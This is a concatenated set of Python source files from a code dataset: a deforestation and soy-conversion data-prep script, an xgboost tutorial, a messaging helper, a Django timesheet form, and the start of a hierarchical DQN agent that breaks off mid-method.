data_df['nonforveg00' + suffix])\n## isPositive(test_series)\n\n#==============================================================================\n# Drop small properties (justified by soy property calculations below)\n#==============================================================================\ndata_df = data_df.loc[(data_df['propareahafinal']>50)]\n\n#==============================================================================\n# Add points extraction data (lat, lon, temp, precip, distance)\n#==============================================================================\npt_df = pd.read_csv(pt_csv)\ndata_df = pd.merge(data_df, pt_df, left_on = 'propertyid', \n right_on = 'propertyid', how = 'left')\n#data_df = data_df.set_index('propertyid')\ndel pt_df\n\n#==============================================================================\n# Drop unnecessary columns\n#==============================================================================\n#drop_cols = ['Unnamed: 0', \n# 'amp_f2s_a_2000', 'amnp_f2s_a_2000', 'ce_f2s_a_2000', 'tot_f_d_20pre01', \n# 'amp_f_d_20pre01', 'amnp_f_d_20pre01', 'ce_f_d_20pre01', \n# 'other00', 'water00', 'nonforveg00',\n# 'PRODES_coverage_area', 'PRODES_coverage_share', 'PRODES_non_coverage_area',\n# 'for00cer', 'nonforveg00cer', 'for00amnonprodes', 'nonforveg00amnonprodes',\n# 'for00amprodes', 'nonforveg00amprodes', 'for00', 'nonforveg00']\n#drop_cols.extend([col for col in data_df.columns if 'am15'==col[:len('am15')]])\n#data_df = data_df.drop(drop_cols, axis = 1)\n\n#drop_list = ['soycer14de2000': 'pre2000_ce_f2s'] \n#drop_list = [col for col in data_df.columns if 'de2000am' in col]\n#drop_list.append()\n#drop_list = [col for col in data_df.columns if 'soycer01' in col]\n#drop_list = [col for col in data_df.columns if 'soycer07' in col]\n#drop_list = [col for col in data_df.columns if 'soyam01' in col]\n#drop_list = [col for col in data_df.columns if 'soyam07' in col]\n#data_df = data_df.drop(drop_list, axis = 1)\n\n#==============================================================================\n# Rename variables\n#==============================================================================\ndata_df = data_df.rename(columns = {'propertyid': 'propid'})\n\nrename_dict = {'forcer': 'ce_tf_',\n 'foramprodes': 'amp_tf_',\n 'foramnonprodes': 'amnp_tf_',\n 'vegcer': 'ce_v_',\n 'vegamprodes': 'amp_v_',\n 'vegamnonprodes': 'amnp_v_',\n 'for': 'ce_tf_',\n 'veg': 'ce_v_'}\ndata_df = data_df.rename(columns = {col: rename_dict[col[6:]] + 'd_' + col[2:6] \\\n for col in data_df.columns if col[:4]=='de20'})\ndata_df = data_df.rename(columns = {col: rename_dict[col[13:]] + 'f2s_20' + col[11:13] \\\n for col in data_df.columns if col[7:11]=='de20'})\ndata_df = data_df.rename(columns = {col: rename_dict[col[14:]] + 'f2s_20' + col[12:14] \\\n for col in data_df.columns if col[8:12]=='de20'})\n\n#rename_dict = {'deamprodes': 'amp_f_d_20',\n# 'deamnonprodes': 'amnp_f_d_20',\n# 'decer': 'ce_f_d_20',\n# 'de': 'tot_f_d_20',\n# 'am15_prodes': 'amp_f2s_a_20',\n# 'am15_nonprodes': 'amnp_f2s_a_20',\n# 'cer14_': 'ce_f2s_a_20'}\n#\n#for orig, new in rename_dict.items():\n# data_df = data_df.rename(columns = {col: col.replace(orig, new) for col \\\n# in data_df.columns if orig == col[:len(orig)]})\n\ndata_df = data_df.rename(columns = {'for00amprodes': 'amp_tf_a_2016',\n 'for00amnonprodes': 'amnp_tf_a_2016',\n 'for00cer': 'ce_tf_a_2016',\n 'nonforveg00amprodes': 'amp_v_a_2016',\n 'nonforveg00amnonprodes': 'amnp_v_a_2016',\n 'nonforveg00cer': 'ce_v_a_2016'})\n\ndata_df = data_df.rename(columns = {'amsoy01': 'am_s_a_2001',\n 'amsoy07': 'am_s_a_2007', \n 'amsoy15': 'am_s_a_2015', \n 'cersoy01': 'ce_s_a_2001',\n 'cersoy07': 'ce_s_a_2007', \n 'cersoy14': 'ce_s_a_2014'})\n\nfor col in data_df.columns:\n print(col)\n\n#==============================================================================\n# Create aggregated deforestation variables\n#==============================================================================\nfor year in range(2001, 2017):\n year = str(year)\n data_df['amp_f_d_' + year] = data_df['amp_tf_d_' + year] + data_df['amp_v_d_' + year]\n data_df['amnp_f_d_' + year] = data_df['amnp_tf_d_' + year] + data_df['amnp_v_d_' + year]\n data_df['ce_f_d_' + year] = data_df['ce_tf_d_' + year] + data_df['ce_v_d_' + year]\n data_df['tot_f_d_' + year] = data_df['ce_f_d_' + year] + data_df['amp_f_d_' + year] + data_df['amnp_f_d_' + year]\n\n# Repeat for soy conversion \nyears = range(2001, 2015)\nf2s_stubs = ['amp_tf_f2s_', 'amnp_tf_f2s_', 'ce_tf_f2s_',\n 'amp_v_f2s_', 'amnp_v_f2s_', 'ce_v_f2s_']\nf2s_cols = [prefix + str(year) for prefix in f2s_stubs \\\n for year in years]\ndata_df.loc[:, f2s_cols] = data_df[f2s_cols].fillna(0)\nfor year in range(2001, 2015): \n year = str(year)\n data_df['amp_f_f2s_' + year] = data_df['amp_tf_f2s_' + year] + data_df['amp_v_f2s_' + year]\n data_df['amnp_f_f2s_' + year] = data_df['amnp_tf_f2s_' + year] + data_df['amnp_v_f2s_' + year]\n data_df['ce_f_f2s_' + year] = data_df['ce_tf_f2s_' + year] + data_df['ce_v_f2s_' + year]\n data_df['tot_f_f2s_' + year] = data_df['ce_f_f2s_' + year] + data_df['amp_f_f2s_' + year] + data_df['amnp_f_f2s_' + year]\n\n#==============================================================================\n# Create ending \"forest\" (forest or non-forest veg) classes\n#==============================================================================\ndata_df['amp_f_a_2016'] = data_df['amp_tf_a_2016'] + data_df['amp_v_a_2016']\ndata_df['amnp_f_a_2016'] = data_df['amnp_tf_a_2016'] + data_df['amnp_v_a_2016']\ndata_df['ce_f_a_2016'] = data_df['ce_tf_a_2016'] + data_df['ce_v_a_2016']\ndata_df['tot_f_a_2016'] = data_df['ce_f_a_2016'] + data_df['amp_f_a_2016'] + data_df['amnp_f_a_2016']\n\n#de_cols = [col for col in data_df.columns if 'tot_f_d' in col]\n#data_df[de_cols].describe()\n\n#==============================================================================\n# ID different treatment categories\n#==============================================================================\ndata_df['amha'] = data_df['amprodesha'] + data_df['amnonprodesha']\ndata_df.loc[:, 'amazon'] = 0\ndata_df.loc[data_df['amha']>0, 'amazon'] = 1\ndata_df.loc[:, 'cerrado'] = 0\ndata_df.loc[data_df['cerha']>0, 'cerrado'] = 1\n\ndata_df.loc['prodes'] = 0\ndata_df.loc[data_df['amprodesha']>1, 'prodes'] = 1\n\ndata_df['in_lam'] = (data_df['dist_aml'] < 0).astype(int)\ndata_df['in_amb'] = (data_df['dist_amb'] < 0).astype(int)\ndata_df['biome_legal'] = data_df['in_amb'] * 10 + data_df['in_lam']\n\n#==============================================================================\n# Calculate total soy area\n#==============================================================================\ndata_df['tot_s_a_2001'] = data_df['am_s_a_2001'] + data_df['ce_s_a_2001']\ndata_df['tot_s_a_2007'] = data_df['am_s_a_2007'] + data_df['ce_s_a_2007']\ndata_df['tot_s_a_2015'] = data_df['am_s_a_2015'] + data_df['ce_s_a_2014']\n\n##==============================================================================\n## Calculate total forest to soy conversion\n##==============================================================================\n#for y in range(2001, 2014):\n# data_df.loc[:, 'tot_f2s_a_' + str(y)] = data_df['amnp_f2s_a_' + str(y)] + \\\n# data_df['amp_f2s_a_' + str(y)] + data_df['ce_f2s_a_' + str(y)]\n\n#==============================================================================\n# Calculate total forest areas and percent deforestation\n#==============================================================================\ndef calc_area(data_df, region, lu):\n prefix = region + '_' + lu\n dif_cols = [col for col in data_df if prefix + '_d_' in col]\n cumdif_df = data_df[dif_cols].cumsum(axis = 1)\n area_df = pd.DataFrame()\n for col in dif_cols:\n area_df[col.replace(prefix + '_d_', prefix + '_a_')] = data_df[prefix + '_a_2000'] - cumdif_df[col]\n area_df[prefix + '_a_2000'] = data_df[prefix + '_a_2000']\n area_df = area_df.sort_index(axis = 1)\n area_df = area_df.drop(prefix + '_a_2000', axis = 1) \n# isPositive(area_df[prefix + '_a_2015'])\n data_df = pd.merge(data_df, area_df, left_index = True, right_index = True, \n how = 'left')\n# ptcl_df = -area_df.pct_change(axis = 1)*100\n# ptcl_df = ptcl_df.rename(columns = {col: col.replace(prefix + '_a_', prefix + '_p_') for \\\n# col in ptcl_df.columns})\n# ptcl_df = ptcl_df.rename(columns = {col: col[:-4] + str(int(col[-4:]) - 1) \\\n# for col in ptcl_df.columns})\n## ptcl_df = ptcl_df.drop(prefix + '_p_1999', axis = 1)\n# data_df = pd.merge(data_df, ptcl_df, left_index = True, right_index = True, \n# how = 'left')\n return data_df\n\n\ndef back_calc_area(data_df, region, lu):\n prefix = region + '_' + lu\n dif_cols = [col for col in data_df if prefix + '_d_' in col]\n col_map = {col: col.replace('_d_', '_a_')[:-4] + \\\n str(int(col[-4:])-1) for col in dif_cols}\n cumdif_df = data_df[dif_cols].sort_index(ascending = False, \n axis = 1).cumsum(axis = 1)\n area_df = pd.DataFrame()\n for col in dif_cols:\n area_df[col_map[col]] = data_df[prefix + '_a_2016'] \\\n + cumdif_df[col]\n isPositive(area_df[prefix + '_a_2015'])\n data_df = pd.merge(data_df, area_df, left_index = True, \n right_index = True, \n how = 'left')\n return data_df\n\ndata_df = back_calc_area(data_df, 'tot', 'f')\ndata_df = back_calc_area(data_df, 'amp', 'f')\ndata_df = back_calc_area(data_df, 'amnp', 'f')\ndata_df = back_calc_area(data_df, 'ce', 'f')\n\n#def add_diff_cols(df, prefix):\n# dif_df = -df.diff(axis = 1)\n# dif_df = dif_df.rename(columns = {col: prefix + '_d_' + col[-4:] \\\n# for col in dif_df.columns})\n# dif_df = dif_df.rename(columns = {col: col[:-4] + str(int(col[-4:]) - 1) \\\n# for col in dif_df.columns})\n# pdif_df = df.pct_change(axis = 1) * 100\n# pdif_df = pdif_df.rename(columns = {col: prefix + '_p_' + col[-4:] \\\n# for col in pdif_df.columns})\n# pdif_df = pdif_df.rename(columns = {col: col[:-4] + str(int(col[-4:]) - 1) \\\n# for col in pdif_df.columns})\n# df = pd.merge(df, dif_df, left_index = True, right_index = True, \n# how = 'left')\n# df = pd.merge(df, pdif_df, left_index = True, right_index = True, \n# how = 'left')\n# return df\n\n#==============================================================================\n# Drop properties with less than 10ha of forest\n#==============================================================================\ndata_df = data_df.loc[data_df['tot_f_a_2000']>10]\n\n#==============================================================================\n# ID soy properties \n#==============================================================================\ndata_df.loc[:, 'soy_2001'] = (data_df['tot_s_a_2001'] > 25).astype(int)\ndata_df.loc[:, 'soy_2007'] = (data_df['tot_s_a_2007'] > 25).astype(int)\ndata_df.loc[:, 'soy_2015'] = (data_df['tot_s_a_2015'] > 25).astype(int)\ndata_df.loc[:, 'newsoy'] = ((data_df['soy_2015']==1) & (data_df['soy_2007']==0)).astype(int)\n\n#soy_cols = [col for col in data_df.columns if 'tot_s_a' in col]\n#soy_df = data_df[soy_cols]\n#soy_df = ((soy_df>25).sum(axis = 1))>1\n#soy_df = soy_df.rename('soy').astype(int)\n#data_df = pd.merge(data_df, pd.DataFrame(soy_df), left_index = True, right_index = True, \n# how = 'left')\n\n#==============================================================================\n# Add random identifier to reduce data size, randomize before output\n#==============================================================================\nnp.random.seed(123)\ndata_df.loc[:, 'random'] = np.random.uniform(size = data_df.shape[0])\ndata_df.to_csv(out_dir + 'wide.csv')\n\n\n\n##==============================================================================\n## Compare property sizes (to justify sample size)\n##==============================================================================\n#prep_df.loc[prep_df['soy']==1, 'propareaha'].describe()\n#prep_df.loc[prep_df['soy']==0, 'propareaha'].describe()\n#\n#prep_df.loc[prep_df['soy']==1, 'propareaha'].quantile(0.05)\n#prep_df.loc[prep_df['soy']==0, 'propareaha'].quantile(0.01)\n#\n#prep_df.loc[(prep_df['soy']==1) & (prep_df['propareaha']>50), 'propareaha'].sum() / prep_df.loc[(prep_df['soy']==1), 'propareaha'].sum()\n#(prep_df['propareaha']<50).sum() / prep_df.shape[0]\n## ie, 99.9% of total area in soy properties is maintained with this restriction, but it cuts the size of the dataset nearly in half\n\n#==============================================================================\n# Convert dataset to long\n#==============================================================================\n#del am_f_a_df\n#del am_ptcl_df\n#del am_s_a_df\n#del am_s_df\n#del ce_f_a_df\n#del ce_ptcl_df\n#del ce_s_a_df\n#del ce_s_df\n#del tot_f_df\n#del tot_s_a_df\n#del tot_s_df\n#del data_df\ngc.collect()\n\ndata_df = data_df.reset_index()\ndrop_stubs = ['amnp_v_d_', 'amp_v_d_', 'ce_v_d_',\n 'amnp_tf_d_', 'amp_tf_d_', 'ce_tf_d_',\n 'amnp_tf_f2s_', 'amp_tf_f2s_', 'ce_tf_f2s_',\n 'amnp_v_f2s_', 'amp_v_f2s_', 'ce_v_f2s_']\ndrop_cols = [col for col in data_df.columns for stub in drop_stubs if stub in col]\ndrop_cols.extend(['ce_v_a_2016', 'amnp_v_a_2016', 'amp_v_a_2016',\n 'ce_tf_a_2016', 'amnp_tf_a_2016', 'amp_tf_a_2016'])\ndata_df = data_df.drop(drop_cols, axis = 1)\nstubs = ['amp_f_f2s_', 'amnp_f_f2s_', 'ce_f_f2s_', 'tot_f_f2s_',\n 'amp_f_a_', 'amnp_f_a_', 'ce_f_a_', 'tot_f_a_',\n# 'amp_f_p_', 'amnp_f_p_', 'ce_f_p_', 'tot_f_p_',\n 'amp_f_d_', 'amnp_f_d_', 'ce_f_d_', 'tot_f_d_',\n 'soydouble', 'soysingle', 'soycotton',\n 'precip_', 'temp_']\n\nlong_df = pd.wide_to_long(data_df, stubnames = stubs, i = 'propid', \n j = 'year')\ndel data_df\ngc.collect()\n\nchange_stubs = [stub for stub in stubs if '_'==stub[-1:]]\nlong_df = long_df.rename(columns = {col: col[:-1] for col in change_stubs})\nlong_df = long_df.reset_index()\nlong_df['year'] = long_df['year'].astype(int)\n\n# =============================================================================\n# Fill temp nulls from arcgis\n# =============================================================================\nlong_df['temp'] = long_df['temp'].replace(-9999, np.nan)\n\n#==============================================================================\n# Save year 2000 forest areas for matching / normalizing\n#==============================================================================\nwide_vars = ['propid', 'tot_f_a', 'amp_f_a', 'amnp_f_a', 'ce_f_a']\nyear = 2000\nlong_df['year'] = long_df['year'].astype(int)\ndata = long_df.loc[long_df['year']==year, wide_vars]\ndata = data.rename(columns = {col: col + '_' + str(year) for col in \\\n data.columns if col!='propid'})\nlong_df = long_df.merge(data, left_on = 'propid', right_on = 'propid', how = 'left')\n\n#==============================================================================\n# Deforestation outcomes\n#==============================================================================\nprefixes = ['tot', 'amp', 'amnp', 'ce']\nfor prefix in prefixes:\n long_df.loc[:, prefix + '_f_sf'] = long_df[prefix + '_f_d'] / \\\n long_df[prefix + '_f_a_2000']\n long_df.loc[:, prefix + '_f_sp'] = long_df[prefix + '_f_d'] / long_df['propareahafinal']\n long_df.loc[:, prefix + '_f_f2s_sf'] = long_df[prefix + '_f_f2s'] / \\\n long_df[prefix + '_f_a_2000']\n long_df.loc[:, prefix + '_f_f2s_sp'] = long_df[prefix + '_f_f2s'] / long_df['propareahafinal']\n\n#==============================================================================\n# Save year 2001-2006 outcomes for matching / normalizing\n#==============================================================================\nwide_vars = ['propid', 'tot_f_sf', 'tot_f_f2s_sf', 'tot_f_a',\n 'precip', 'temp']\n# 'propid', 'tot_f_d', 'tot_f_f2s_a', 'tot_f2s_sp', 'tot_f_sp', 'temp', 'precip']\nyear_list = range(2001, 2007)\nfor year in year_list:\n data = long_df.loc[long_df['year']==year, wide_vars]\n data = data.rename(columns = {col: col + '_' + str(year) for col in \\\n data.columns if col!='propid'})\n long_df = long_df.merge(data, left_on = 'propid', right_on = 'propid', how = 'left')\n\n#==============================================================================\n# Additional calculations\n#==============================================================================\nlong_df.loc[:, 'tot_hys_s'] = (long_df['soydouble'] + long_df['soycotton']) / \\\n (long_df['soydouble'] + long_df['soycotton'] + long_df['soysingle'])\nlong_df.loc[:, 'border'] = ((long_df['amdist']<20) & (long_df['cerdist']<20)).astype(int)\n \n#==============================================================================\n# Treatment indicators\n#==============================================================================\nlong_df['soy'] = ((long_df['soy_2007']) | (long_df['soy_2001'])).astype(int)\nlong_df['late'] = (long_df['year']>2006).astype(int)\nlong_df['soym'] = ((long_df['soy']==1) & (long_df['amazon']==1) & \\\n (long_df['late']==1)).astype(int)\nlong_df['late_amazon'] = ((long_df['late']==1) & (long_df['amazon']==1)).astype(int)\nlong_df['late_soy'] = ((long_df['late']==1) & (long_df['soy']==1)).astype(int)\nlong_df = long_df.set_index(['propid', 'year'])\n\n# =============================================================================\n# Data cleaning\n# =============================================================================\nlong_df[['suit', 'verysuit']] = long_df[['suit', 'verysuit']].fillna(0)\n\n##==============================================================================\n## Testing\n##==============================================================================\nshr_vars = ['tot_f_sf', 'tot_f_sp', 'tot_f_f2s_sf', 'tot_f_f2s_sp', 'tot_hys_s']\nfor shr_var in shr_vars:\n isShare(long_df[shr_var], 0.2)\n long_df.loc[long_df[shr_var]<0, shr_var] = 0\n long_df.loc[long_df[shr_var]>1, shr_var] = 1\n\narea_vars = ['tot_f_a', 'amnp_f_a', 'amp_f_a', 'ce_f_a']\nfor area_var in area_vars:\n isPositive(long_df[area_var], 10)\n long_df.loc[long_df[area_var]<0, area_var] = 0\n\n##==============================================================================\n## Spatial weights calculation\n##==============================================================================\n##test = long_df.loc[(slice(None), 2005), :]\n##test_kdtree = ps.cg.KDTree(test[['x_centroid', \n## 'y_centroid']].as_matrix())\n##test_w = ps.weights.Distance.KNN(test_kdtree, k=3, p=2)\n##test_w.transform = 'r'\n##test['lags'] = ps.lag_spatial(test_w, test['tot_f2s_sf'])\n##test.lags.describe()\n#kdtree = ps.cg.KDTree(long_df.loc[(slice(None), 2000), ['x_centroid', \n# 'y_centroid']].as_matrix())\n#w = ps.weights.Distance.KNN(kdtree, k=5, p=2)\n#w.transform = 'r' # row standardize\n#lag_vars = ['tot_f_a', 'tot_f2s_a', 'tot_f_sf', 'tot_f2s_sf', 'tot_f_sp', 'tot_f2s_sp']\n##renamed_lag_vars = [lag_var + '_lag' for lag_var in lag_vars]\n##long_df = long_df.reindex(columns = long_df.columns.tolist() + renamed_lag_vars)\n#for lag_var in lag_vars:\n# for year in range(2000, 2017):\n# long_df.loc[(slice(None), year), lag_var + '_slag'] = \\\n# ps.lag_spatial(w, long_df.loc[(slice(None), year), lag_var])\n\n# =============================================================================\n# Add data for soy expansion summary stats\n# =============================================================================\nload_cols = ['propertyid']\nload_cols.extend([col for col in header.columns if \\\n (col.startswith('soyam15newde20') | col.startswith('soycer14newde20') | \\\n col.startswith('soyam07newde20') | col.startswith('soycer07newde20'))])\n\nsoy_df = data_df = pd.read_csv(data_csv, engine = 'python', na_values = 'na',\n usecols = load_cols)\n\nsoy_df = soy_df.set_index('propertyid')\ndef rename_col(col):\n col = col.replace('soy', '')\n col = col.replace('newde', '_')\n col = col.replace('cer', 'ce')\n return col\nsoy_df = soy_df.rename(columns = rename_col)\ncols_early = [col for col in soy_df.columns if (col[2:4]=='07') & ('2000' not in col)]\nconv_early = soy_df[cols_early].sum(axis = 1)\n#cols_late = [col for col in soy_df.columns if ((col[2:4]=='14') | (col[2:4]=='15')) & (('2000' not in col) & ('2015' not in col))]\ncols_late = [col for col in soy_df.columns if ((col[2:4]=='14') | (col[2:4]=='15')) & any(str(y) in col for y in list(range(2007, 2015)))]\nconv_late = soy_df[cols_late].sum(axis = 1)\n\n\n\nconv_df = pd.DataFrame({'soyconv_late': conv_late, 'soyconv_early': conv_early})\n#long_df = long_df.merge(conv_df, left_index = True, right_index = True, how = 'left')\nconv_df.to_csv(out_dir + 'soy_conv.csv')\n\n#==============================================================================\n# Save out file\n#==============================================================================\nlong_df = long_df.sort_values('random')\nlong_df.to_csv(out_dir + 'long.csv')\n#long_df.to_stata(out_dir + 'long.dta')\n\n","sub_path":"data_prep.py","file_name":"data_prep.py","file_ext":"py","file_size_in_byte":29108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"358101658","text":"#%%\n# ---------------------------------\n# 데이터 등 준비\n# ----------------------------------\nimport numpy as np\nimport pandas as pd\n\n# train_x는 학습 데이터, train_y는 목적 변수 test_x는 테스트 데이터\n# pandas의 DataFrame, Series로 유지합니다. (numpy의 array로 유지합니다.)\n\ntrain = pd.read_csv('../input/sample-data/train_preprocessed.csv')\ntrain_x = train.drop(['target'], axis=1)\ntrain_y = train['target']\ntest_x = pd.read_csv('../input/sample-data/test_preprocessed.csv')\n\n# 学習データを学習データとバリデーションデータに分ける\nfrom sklearn.model_selection import KFold\n\nkf = KFold(n_splits=4, shuffle=True, random_state=71)\ntr_idx, va_idx = list(kf.split(train_x))[0]\ntr_x, va_x = train_x.iloc[tr_idx], train_x.iloc[va_idx]\ntr_y, va_y = train_y.iloc[tr_idx], train_y.iloc[va_idx]\n\n#%%\n# -----------------------------------\n# xgboost의 활용\n# -----------------------------------\nimport xgboost as xgb\nfrom sklearn.metrics import log_loss\n\n# 특징(feature)와 목적변수를 xgboost의 데이터 구조로 변환\ndtrain = xgb.DMatrix(tr_x, label=tr_y)\ndvalid = xgb.DMatrix(va_x, label=va_y)\ndtest = xgb.DMatrix(test_x)\n\n# 하이퍼 파라미터의 설정\nparams = {'objective': 'binary:logistic', 'silent': 1, 'random_state': 71}\nnum_round = 50\n\n# 학습의 실행\n# 검증 데이터도 모델에게 건네주어 학습 진행과 함께 점수가 어떻게 달라지는지 모니터링 한다.\n# watchlist로 학습 데이터 및 검증 데이터를 준비\nwatchlist = [(dtrain, 'train'), (dvalid, 'eval')]\nmodel = xgb.train(params, dtrain, num_round, evals=watchlist)\n\n# 검증 데이터의 스코어를 확인\nva_pred = model.predict(dvalid)\nscore = log_loss(va_y, va_pred)\nprint(f'logloss: {score:.4f}')\n\n# 예측(두 개의 값의 예측값이 아니라 1일 확률을 출력한다.)\npred = model.predict(dtest)\n\n#%%\n# -----------------------------------\n# 학습 데이터와 검증 데이터의 score의 모니터링\n# -----------------------------------\n# 모니터링을 logloss로 수행한다. early_stopping_rounds를 20라운드로 한다.\nparams = {'objective': 'binary:logistic', 'silent': 1, 'random_state': 71,\n 'eval_metric': 'logloss'}\nnum_round = 500\nwatchlist = [(dtrain, 'train'), (dvalid, 'eval')]\nmodel = xgb.train(params, dtrain, num_round, evals=watchlist,\n early_stopping_rounds=20)\n\n# 최적의 결정 트리의 개수로 예측\npred = model.predict(dtest, ntree_limit=model.best_ntree_limit)\n","sub_path":"ch04/ch04-02-run_xgb.py","file_name":"ch04-02-run_xgb.py","file_ext":"py","file_size_in_byte":2522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"423421382","text":"from Port.client import Client\nfrom Damasanj.apps import DamasanjConfig as Dc \ntoken = Dc.Sid\nbama = Client(token)\n\nclass dama :\n def send(data,rname):\n if data['type'].lower() == 'text':\n \n sendp(data['body'],rname,'TEXT')\n\n bama.send_message(data)\n\n\ndef sendp(d,r,t):\n print (\"(send %s) <%s>>> %s\" %(t,r,d.splitlines()[0])) \n for q in d.splitlines():\n sp = ' '*len(\"(send %s) <%s>>> %s\" %(t,r,d.splitlines()[0]))\n print (\"%s%s\" %(sp,q))\n print ('\\n\\n\\n\\n')","sub_path":"SDimServer/Receiving/send.py","file_name":"send.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"433255962","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom django import forms\nimport datetime\nfrom django.utils.html import format_html\nfrom django.utils.encoding import force_text\nfrom django.utils.safestring import mark_safe\n\n\nclass Select1(forms.Select):\n\n def render_option(self, selected_choices, option_value, option_label):\n html = super(Select1, self).render_option(selected_choices, option_value, option_label)\n html_style= html.replace('>', ' style=\"background: #f0f0f0; color: #000;\">', 1)\n return html_style\n\n\nclass TabelDialogForm(forms.Form):\n department = forms.ChoiceField(required=True, initial=1,\n widget=Select1(attrs={'style': 'background: #f0f0f0; color: #000;'})\n )\n year_num = forms.IntegerField(required=True,\n min_value=2000,\n max_value=2100,\n widget=forms.NumberInput(attrs={'style': 'background: #f0f0f0; color: #000;'}\n )\n\n\n )\n month_num = forms.ChoiceField(required=True,\n choices=((1,1),(2,2),(3,3),(4,4),(5,5),(6,6),(7,7),(8,8), (9,9),(10,10),(11,11),(12,12),),\n widget=Select1(attrs={\n 'style': 'background: #f0f0f0; color: #000;'}\n )\n )\n\n is_staffer = forms.BooleanField(initial=True, required=False)\n is_first_half_of_month = forms.BooleanField(initial=False, required=False)\n\n def __init__(self, *args, **kwargs):\n # #self.base_fields['department'].choices = DEPARTMENTS\n departments = kwargs.pop('departments', {})\n super(TabelDialogForm, self).__init__(*args, **kwargs)\n self.fields['department'].choices = departments\n self.fields['year_num'].initial = cur_year()\n self.fields['month_num'].initial = cur_month()\n\n\ndef cur_year():\n return datetime.datetime.now().year\n\n\ndef cur_month():\n return datetime.datetime.now().month","sub_path":"main/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"71175638","text":"import numpy as np\nimport torch\nfrom rl.model import DDQN_Model, ICM_Model\nfrom rl.memory import Memory\nfrom rl.per import PERMemory\nfrom torch.nn.functional import mse_loss, cross_entropy, smooth_l1_loss, softmax\nimport settings as sett\nimport itertools\nimport os\n\n\nclass EHDQN:\n def __init__(self, state_dim, tau, action_dim, gamma, n_subpolicy, max_time, hidd_ch, lam, lr, eps,\n eps_decay, eps_sub, eps_sub_decay, beta, bs, target_interval, train_steps, max_memory, max_memory_sub,\n conv, gamma_macro, reward_rescale, n_proc, per=False, norm_input=True, logger=None):\n \"\"\"\n :param state_dim: Shape of the state\n :param float tau: Weight for agent loss\n :param gamma_macro: Discount for macro controller\n :param int action_dim: Number of actions\n :param float gamma: Discount for sub controller\n :param int n_subpolicy: Number of sub policies\n :param int max_time: Number of steps for each sub policy\n :param int hidd_ch: Number of hidden channels\n :param float lam: Scaler for ICM reward\n :param float lr: Learning rate\n :param float eps: Eps greedy chance for macro policy\n :param float eps_decay: Epsilon decay computed as eps * (1 - eps_decay) each step\n :param float eps_sub: Eps greedy change for sub policies\n :param float eps_sub_decay: Epsilon decay for sub policy computed as eps * (1 - eps_decay) each step\n :param float beta: Weight for loss of fwd net vs inv net\n :param int bs: Batch size\n :param int target_interval: Number of train steps between target updates\n :param int train_steps: Number of training iterations for each call\n :param int max_memory: Max memory\n :param bool conv: Use or not convolutional networks\n :param bool per: Use or not prioritized experience replay\n :param int max_time: Maximum steps for sub policy\n \"\"\"\n\n # Parameters\n self.logger = logger\n self.state_dim = state_dim\n self.action_dim = action_dim\n self.target_interval = target_interval\n self.lr = lr\n self.bs = bs\n # Macro Policy parameters\n self.eps = eps\n self.eps_decay = 1 - eps_decay\n self.gamma_macro = gamma_macro\n # Sub policy parameters\n self.n_subpolicy = n_subpolicy\n self.tau = tau\n self.eps_sub = eps_sub\n self.eps_sub_decay = 1 - eps_sub_decay\n self.gamma = gamma\n # ICM parameters\n self.beta = beta\n self.lam = lam\n\n self.n_proc = n_proc\n self.selected_policy = np.full((self.n_proc,), fill_value=None)\n self.macro_state = np.full((self.n_proc,), fill_value=None)\n self.max_time = max_time\n self.train_steps = train_steps\n self.reward_rescale = reward_rescale\n self.norm_input = norm_input\n self.per = per\n self.curr_time = np.zeros((self.n_proc, ), dtype=np.int)\n self.macro_reward = np.zeros((self.n_proc,), dtype=np.float)\n self.target_count = np.zeros((self.n_subpolicy,), dtype=np.int)\n self.counter_macro = np.zeros((self.n_subpolicy,), dtype=np.int)\n self.counter_policies = np.zeros((self.n_subpolicy, self.action_dim), dtype=np.int)\n self.macro_count = 0\n\n if self.per:\n memory = PERMemory\n else:\n memory = Memory\n\n # Create Policies / ICM modules / Memories\n self.macro = DDQN_Model(state_dim, n_subpolicy, conv=conv, hidd_ch=hidd_ch)\n self.macro_target = DDQN_Model(state_dim, n_subpolicy, conv=conv, hidd_ch=hidd_ch)\n self.macro_target.update_target(self.macro)\n self.macro_memory = Memory(max_memory)\n self.macro_opt = torch.optim.Adam(self.macro.parameters(), lr=self.lr * 4 if self.per else self.lr)\n self.memory, self.policy, self.target, self.icm, self.policy_opt, self.icm_opt = [], [], [], [], [], []\n for i in range(n_subpolicy):\n # Create sub-policies\n self.policy.append(DDQN_Model(state_dim, action_dim, conv=conv, hidd_ch=hidd_ch, macro=self.macro).to(sett.device))\n self.target.append(DDQN_Model(state_dim, action_dim, conv=conv, hidd_ch=hidd_ch, macro=self.macro).to(sett.device))\n self.target[-1].update_target(self.policy[-1])\n self.memory.append(memory(max_memory_sub))\n\n # Create ICM modules\n self.icm.append(ICM_Model(self.state_dim, self.action_dim, conv).to(sett.device))\n\n # Create sub optimizers\n self.policy_opt.append(torch.optim.Adam(self.policy[i].parameters(), lr=self.lr))\n self.icm_opt.append(torch.optim.Adam(self.icm[i].parameters(), lr=1e-3))\n\n # Send macro to correct device\n self.macro = self.macro.to(sett.device)\n self.macro_target = self.macro_target.to(sett.device)\n\n def save(self, i):\n if not os.path.isdir(sett.SAVEPATH):\n os.makedirs(sett.SAVEPATH)\n torch.save(self.macro.state_dict(), os.path.join(sett.SAVEPATH, 'Macro_%s.pth' % i))\n for sub in range(self.n_subpolicy):\n torch.save(self.policy[sub].state_dict(), os.path.join(sett.SAVEPATH, 'Sub_%s_%s.pth' % (sub, i)))\n torch.save(self.icm[sub].state_dict(), os.path.join(sett.SAVEPATH, 'Icm_%s_%s.pth' % (sub, i)))\n\n def load(self, path, i):\n self.macro.load_state_dict(torch.load(os.path.join(path, 'Macro_%s.pth' % i), map_location=sett.device))\n for sub in range(self.n_subpolicy):\n self.policy[sub].load_state_dict(torch.load(os.path.join(path, 'Sub_%s_%s.pth' % (sub, i)), map_location=sett.device))\n self.icm[sub].load_state_dict(torch.load(os.path.join(path, 'Icm_%s_%s.pth' % (sub, i)), map_location=sett.device))\n\n def act(self, obs, deterministic=False):\n x = 